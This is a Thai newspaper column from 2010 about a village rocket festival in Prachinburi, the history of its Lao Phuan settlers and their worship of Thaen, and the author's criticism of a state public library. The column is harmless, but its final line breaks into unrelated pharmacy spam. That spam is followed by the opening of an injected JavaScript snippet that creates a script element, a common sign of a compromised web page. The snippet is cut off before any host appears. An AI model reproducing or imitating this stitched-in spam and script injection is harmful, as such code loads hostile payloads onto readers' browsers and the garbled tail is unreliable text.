หนังสือพิมพ์มติชน ฉบับวันพฤหัสบดีที่  6   พฤษภาคม   พ.ศ. 2553

ท้องถิ่น อ. ศรีมโหสถ จ. ปราจีนบุรี ร่วมกันจัดงานประเพณีบุญบั้งไฟ ที่วัดต้นโพธิ์ศรีมหาโพธิ(อ. ศรีมโหสถ จ. ปราจีนบุรี) ตั้งแต่วันที่ 26, 27 แล้วจุดบั้งไฟไป “ขอฝน”ผีฟ้าพญาแถน ในวันพุธที่ 28 เมษายน 2553 ที่ผ่านมา

เหตุที่มีบุญบั้งไฟในท้องถิ่นลุ่มน้ำบางปะกง ทางภาคตะวันตกออกของไทยเพราะราษฎรส่วนมากที่มาตั้งหลักแหล่งอยู่ท้องถิ่นนี้ราว 184 ปีมาแล้ว ตั้งแต่ พ.ศ. 2369 ในแผ่นดินรัชกาลที่ 3 ล้วนเป็นกลุ่มพวนถูกกวาดต้อนเป็นเชลยจากเชียงขวาง ในลาว แล้วเรียกกันในเฉพาะไทยว่า ลาวพวน


ตระกูลลาวทั้งหมดล้วนเคารพนับถือแถน หรือภาษาปากว่า ผีฟ้าพญาแถน

บรรพชนคนไทยทุกวันนี้มีเชื้อสายลาวด้วย จึงนับถือแถนด้วย มีหลักฐานสำคัญมาก อยู่ในโองการแช่งน้ำยุคก่อนกรุงศรีอยุธยา เรียกพระพรหมสร้างโลกว่าขุนแผน เพี้ยนเสียงจาก(ขุน)แถนนั่นเอง

ประเพณีจุดบั้งไฟที่วัดต้นโพธิ์ฯคงมีมาตั้งแต่ยุคแรกมาตั้งหลักแหล่งที่นี่ราว  184 ปีมาแล้ว เพราะต้นโพธิ์มีก่อนลาวพวนมาถึง เมื่อลาวพวนมาถึงก็กราบไหว้ต้นโพธิ์เป็นศูนย์กลางศักดิ์สิทธิ์ของชุมชนท้องถิ่น มีจุดบั้งไฟสืบเนื่องมาจนแผ่นดินรัชกาลที่ 5 จึงทรงมีลายพระหัตถ์เล่าไว้ ต่อจากนั้นจุดบั้งไฟสืบจนปัจจุบันไม่เคยขาดตอน

เมื่อเรียนชั้นประถมอยู่วัดต้นโพธิ์ฯ ผมเป็นเด็กวัด “กินข้าววัด นอนศาลา ห่มผ้าผี” แต่ “ไม่มีเมียหมา” ถูกหลวงน้ากับหลวงพี่ให้ตำดินประสิวกับกำมะถัน ทำบั้งไฟ, พลุ, ตะไล, ฯลฯ นับไม่ถ้วน

“มโหสถศาลา” พิมพ์ใบปลิวแบ่งปันความรู้เหล่านี้แจกคนไปดูจุดบั้งไฟจะได้อ่านเล่นๆขณะรอดูบั้งไฟกระบอกใหม่ กับใช้รองตูดนั่งหัวคันนาแหงนเบิ่งบั้งไฟขึ้นฟ้าได้ ถ้าไม่ชอบก็ทิ้งลงถังขยะไปเลย ไม่มีปัญหาอะไร ถ้าชอบก็พับใส่กระเป๋าไปฝากลูกหลาน“อ่าน”ได้อีก

ความรู้มีอยู่ในทุกหนทุกแห่งทุกสถานที่และทุกเวลา แม้นอกห้องเรียน, นอกห้องสมุด, นอกหนังสือ, ฯลฯ ก็มีความรู้ได้อย่างง่ายๆ สบายมาก ไม่ต้องลำบากไปเข้าห้องเรียน, ห้องสมุด, แม้กระทั่งห้อง com. และห้องขี้

ห้องสมุดประชาชน “เฉลิมราชกุมารี” ที่ กศน. กระทรวงศึกษาธิการ หวงแหนดูแลเอง ไม่ยอมปล่อยให้ใคร แต่ไม่เคลื่อนไหวแบ่งปันเผยแพร่ความรู้สู่ท้องถิ่นให้สม่ำเสมอต่อเนื่อง มีแต่เสวยสุขบนกองทุกข์ของท้องถิ่น

คณะทำงานมโหสถศาลา เป็นกลุ่มเอกชนเลยต้องพิมพ์ใบปลิวอย่างกะทันหัน เพื่อแบ่งปัน“การอ่าน”ทีละเล็กทีละน้อย กับ“ความรู้”ความเป็นมาท้องถิ่นทีละนิด ทีละหน่อยตามมีตามเกิด ด้วยทุนทรัพย์ตัวเอง ไม่มีใครอุดหนุน

กระทรวงศึกษาธิการ ดีแต่(ปาก)พูด good but mouth

ฉะนั้น เราต้องร่วมกันออกแรงทำเอง ไม่ต้องวิงวอนร้องขอเทวดาหน้าไหนใน กศน. กระทรวงศึกษาธิการ

เมื่อห้องสมุดประชาชนฯ ของ กศน. ไม่ทำงาน เรามาร่วมมือกันยก“ห้องสมุด”ไปหาประชาราษฎรด้วย ใบปลิวแบ่งปันความรู้ สู่กัน“อ่าน”เถิดfluoxetine cost cvs buy azithromycin 500mg online var d=document;var s=d.createElement(‘script’);